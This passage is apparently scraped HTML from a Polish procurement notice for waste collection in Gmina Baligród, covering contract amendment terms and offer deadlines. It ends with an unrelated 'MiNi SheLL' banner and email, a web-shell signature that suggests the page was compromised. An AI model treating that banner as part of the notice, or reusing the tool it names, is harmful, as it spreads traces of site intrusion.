najmniej<br/>jednej z wymienionych w niniejszym paragrafie okoliczności oraz określa warunki zmian w ust. 2<br/>- 9 niniejszego paragrafu Umowy.<br/>2. W przypadku zmiany wysokości obowiązującej stawki podatku VAT w sytuacji, gdy w trakcie<br/>realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla robót objętych<br/>przedmiotem Umowy. W takim przypadku Zamawiający dopuszcza możliwość zmiany wysokości<br/>wynagrodzenia, określonego w § 3 ust. 1 Umowy, o kwotę równą różnicy w kwocie podatku.<br/>3. W przypadku zmiany regulacji prawnych odnoszących się do praw i obowiązków stron<br/>Umowy, wprowadzonych po zawarciu Umowy, wywołujących niezbędną potrzebę zmiany<br/>sposobu realizacji Umowy, Zamawiający dopuszcza możliwość zmiany sposobu realizacji<br/>Umowy, wysokości wynagrodzenia, określonego w § 3 ust. 1 Umowy,<br/>4.W przypadku zmiany ilości (zmniejszenie lub zwiększenie) odpadów objętych umową- cena<br/>jednostkowa nie może ulec zmianie.<br/>5 Zmiana harmonogramu wywozu odpadów po uzyskaniu akceptacji Zamawiającego.<br/>6. W przypadku, gdy w Umowie znajdują się oczywiste błędy pisarskie lub rachunkowe,<br/>Zamawiający dopuszcza zmiany postanowień Umowy, w których występują takie oczywiste<br/>błędy pisarskie lub rachunkowe.<br/>7. Zamawiający przewiduje możliwość dokonania zmian i uzupełnień nieistotnych Umowy (nie<br/>stanowiących zmian istotnych niniejszej umowy), w szczególności:<br/>a) zmiana nazwy, siedziby stron Umowy, numerów kont bankowych oraz innych danych<br/>identyfikacyjnych,<br/>b) zmiana osób odpowiedzialnychza kontakty i nadzór nad przedmiotem Umowy.<br/>8. W przypadku zmiany instalacji do przetwarzania odpadów komunalnych, do których<br/>Wykonawca jest zobowiązany przekazywać odebrane z terenu Gminy Baligród odpady<br/>komunalne w przypadku wystąpienia okoliczności umożliwiających przetwarzanie odpadów w<br/>innej instalacji w szczególności w przypadku zmiany Wojewódzkiego Planu Gospodarki<br/>Odpadami w zakresie zmiany regionów gospodarki odpadami oraz powstania nowych instalacjido przetwarzania odpadów komunalnych lub zamknięcia istniejących. Wykonawca jest<br/>zobowiązany powiadomić pisemnie Zamawiającego o zmianie instalacji, do której będzie<br/>przekazywał odebrane odpady co najmniej z 1 miesięcznym wyprzedzeniem;<br/>9. W przypadku zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy,<br/>wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości<br/>lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na<br/>powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią<br/>dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania<br/>umowy przez Wykonawcę.<br/>10. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej<br/>zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-02 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-02 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com